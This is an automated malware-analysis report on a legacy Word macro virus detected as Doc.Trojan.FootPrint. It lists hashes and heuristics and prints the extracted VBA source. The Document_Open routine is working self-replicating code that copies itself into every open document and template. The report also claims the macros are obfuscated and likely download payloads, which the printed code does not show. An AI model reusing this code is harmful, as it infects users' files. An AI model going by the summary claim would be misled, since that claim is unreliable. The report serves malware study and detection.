Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5aec1c3ddea90cef…

MALICIOUS

Office (OLE)

49.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9afb3fa3306b27ef9d5aa05e48902882 SHA-1: ae61895276f78a98127e633ee7b900f6eb92eca9 SHA-256: 5aec1c3ddea90cef99b66ba3a522244908335e3aa85c0aa64d81818fb817f62e
196 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of legacy WordBasic macro viruses and contains VBA macros, including AutoClose and Document_Open, which are commonly used to execute malicious code upon document interaction. ClamAV detections indicate this file is recognized as malware. The macros themselves appear to be truncated or obfuscated, preventing a detailed analysis of their specific actions, but their presence and the legacy markers strongly suggest a malicious intent, likely to download or execute further payloads.

Heuristics 5

  • ClamAV: Doc.Trojan.FootPrint-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.FootPrint-4
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12997 bytes
SHA-256: a5d8d136464db5f055ea2960f2514470d5e21cac98ae7bbe91c2132b403278d7
Detection
ClamAV: Doc.Trojan.FootPrint-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
End
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:56ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57

Sub ToolsMacro()
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
Sub ViewVBCode()
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'16/11/1999 03:52:27 PMthames on \\SCANDIUM\THAMESBTsdjw3456ot76 weor9w5834958316/11/1999 03:52:27 PM
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
'MV Version 1e
'12/11/1999 16:47:57ORCME-DISCOVERY on \\SORCMENW01\ORCME-DISCOVERYBTsdjw3456ot76 weor9w5834958312/11/1999 16:47:57
End Sub
'MV Version 1e


Private Sub Document_Open()
On Error Resume Next
Dim al As String
Dim adoc As Document
Dim atpl As Template
ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$"
Open "c:\footprint.$$$" For Input As #1
Open "c:\footprint.$$1" For Output As #2
Line Input #1, al
Line Input #1, al
Line Input #1, al
Line Input #1, al
While Not EOF(1)
    Line Input #1, al
    Print #2, al
Wend
Close 1
Close 2
For Each adoc In Documents
    If Not adoc.CustomDocumentProperties("FootPrint") Then
        adoc.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text = adoc.FullName
        adoc.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
        adoc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
    End If
Next
For Each atpl In Templates
    If Not atpl.CustomDocumentProperties("FootPrint") Then
        atpl.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
        atpl.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
    End If
Next
End Sub


Private Sub Document_Close()
On Error GoTo Close_error
    If ActiveDocument.Variables(strPOST_WIZ_BLN).Value = "1" Then
        If fPostWizBlnOpen Then
            objPostWizBln.Close
            fPostWizBlnOpen = False
        End If
    End If
    
Close_error:
    Err.Clear
End Sub
Private Sub Document_New()
Start wizard
End Sub
 Sub

Open this report in the interactive analyzer, or submit your own file for analysis.